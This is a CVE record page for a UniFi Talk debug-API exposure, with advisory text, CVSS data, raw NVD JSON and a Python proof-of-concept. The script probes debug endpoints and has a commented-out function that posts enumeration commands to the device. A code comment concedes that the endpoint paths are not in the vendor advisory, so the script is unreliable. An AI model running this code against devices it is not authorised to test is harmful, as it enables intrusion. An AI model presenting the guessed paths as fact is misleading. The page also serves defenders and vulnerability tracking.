Security Vulnerability Report
CVE-2025-52663 CVSS 7.3 HIGH

CVE-2025-52663

Published: 2025-10-31 00:15:37
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability was identified in certain UniFi Talk devices where internal debugging functionality remained unintentionally enabled. This issue could allow an attacker with access to the UniFi Talk management network to invoke internal debug operations through the device API.

Affected Products:
UniFi Talk Touch (Version 1.21.16 and earlier)
UniFi Talk Touch Max (Version 2.21.22 and earlier)
UniFi Talk G3 Phones (Version 3.21.26 and earlier)

Mitigation:
Update the UniFi Talk Touch to Version 1.21.17 or later.
Update the UniFi Talk Touch Max to Version 2.21.23 or later.
Update the UniFi Talk G3 Phones to Version 3.21.27 or later.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

UniFi Talk Touch < 1.21.17
UniFi Talk Touch Max < 2.21.23
UniFi Talk G3 Phones < 3.21.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-52663 PoC - UniFi Talk Debug API Access
# WARNING: This code is for educational and authorized security testing only
# Unauthorized access to computer systems is illegal

import requests
import json
import sys

# Configuration
TARGET_IP = "192.168.1.100"  # Replace with target UniFi Talk device IP
TARGET_PORT = 8443
DEBUG_ENDPOINT = "/api/debug"  # Not used below; kept from the original PoC


def check_vulnerability():
    """
    Check if UniFi Talk device is vulnerable to CVE-2025-52663
    by attempting to access internal debug functionality.
    """
    print(f"[*] Testing CVE-2025-52663 on {TARGET_IP}:{TARGET_PORT}")

    # Target URLs for debug endpoints.
    # NOTE: none of these paths appear in the vendor advisory or the NVD
    # record on this page; treat a 200 here as a hint, not a confirmation.
    endpoints = [
        f"https://{TARGET_IP}:{TARGET_PORT}/api/internal/debug",
        f"https://{TARGET_IP}:{TARGET_PORT}/api/debug/commands",
        f"https://{TARGET_IP}:{TARGET_PORT}/api/debug/system/status"
    ]

    headers = {
        "User-Agent": "UniFi-Talk-Debug-Client/1.0",
        "Content-Type": "application/json",
        "X-Debug-Access": "enabled"
    }

    for endpoint in endpoints:
        try:
            print(f"[*] Testing endpoint: {endpoint}")
            response = requests.get(endpoint, headers=headers, verify=False, timeout=10)

            # Check if debug functionality is accessible
            if response.status_code == 200:
                print(f"[+] VULNERABLE: Debug endpoint accessible at {endpoint}")
                print(f"[+] Response: {response.text[:500]}")
                return True
            elif response.status_code == 401:
                print(f"[-] Protected: {endpoint} requires authentication")
            else:
                print(f"[-] Response code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")

    print("[*] No accessible debug endpoints found")
    return False


def exploit_debug_commands():
    """
    Attempt to execute debug commands if vulnerability is confirmed.
    This demonstrates the potential impact of the vulnerability.
    """
    print("[*] Attempting to execute debug commands...")

    debug_commands = [
        {"cmd": "system_info"},
        {"cmd": "list_processes"},
        {"cmd": "network_config"},
        {"cmd": "user_list"}
    ]

    for cmd in debug_commands:
        try:
            url = f"https://{TARGET_IP}:{TARGET_PORT}/api/debug/execute"
            response = requests.post(url, json=cmd, headers={
                "Content-Type": "application/json",
                "User-Agent": "Debug-Client"
            }, verify=False, timeout=10)

            if response.status_code == 200:
                print(f"[+] Command '{cmd['cmd']}' executed successfully")
                print(f"    Result: {response.json()}")
        except Exception as e:
            print(f"[-] Command '{cmd['cmd']}' failed: {e}")


if __name__ == "__main__":
    print("CVE-2025-52663 - UniFi Talk Debug Functionality Exposure")
    print("=" * 60)

    # Suppress SSL warnings for testing
    requests.packages.urllib3.disable_warnings()

    is_vulnerable = check_vulnerability()

    if is_vulnerable:
        print("\n[!] Device is VULNERABLE to CVE-2025-52663")
        print("[!] Recommended action: Update firmware immediately")
        # Uncomment below to test debug commands (authorized testing only)
        # exploit_debug_commands()
    else:
        print("\n[*] Device may not be vulnerable or is already patched")
        print("[*] Verify the firmware version is >= 1.21.17/2.21.23/3.21.27")
```

References

Ubiquiti Security Advisory Bulletin 055: https://community.ui.com/releases/Security-Advisory-Bulletin-055-055/9b65527b-489c-4f16-ac34-2b887754db1e

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-52663",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T00:15:36.773",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was identified in certain UniFi Talk devices where internal debugging functionality remained unintentionally enabled. This issue could allow an attacker with access to the UniFi Talk management network to invoke internal debug operations through the device API.\r\n\r\n\r\nAffected Products:\r\nUniFi Talk Touch (Version 1.21.16 and earlier) \r\nUniFi Talk Touch Max (Version 2.21.22 and earlier) \r\nUniFi Talk G3 Phones (Version 3.21.26 and earlier) \r\n \r\nMitigation:\r\nUpdate the UniFi Talk Touch to Version 1.21.17 or later.\r\nUpdate the UniFi Talk Touch Max to Version 2.21.23 or later.\r\nUpdate the UniFi Talk G3 Phones to Version 3.21.27 or later."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-489"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.ui.com/releases/Security-Advisory-Bulletin-055-055/9b65527b-489c-4f16-ac34-2b887754db1e",
        "source": "[email protected]"
      }
    ]
  }
}
```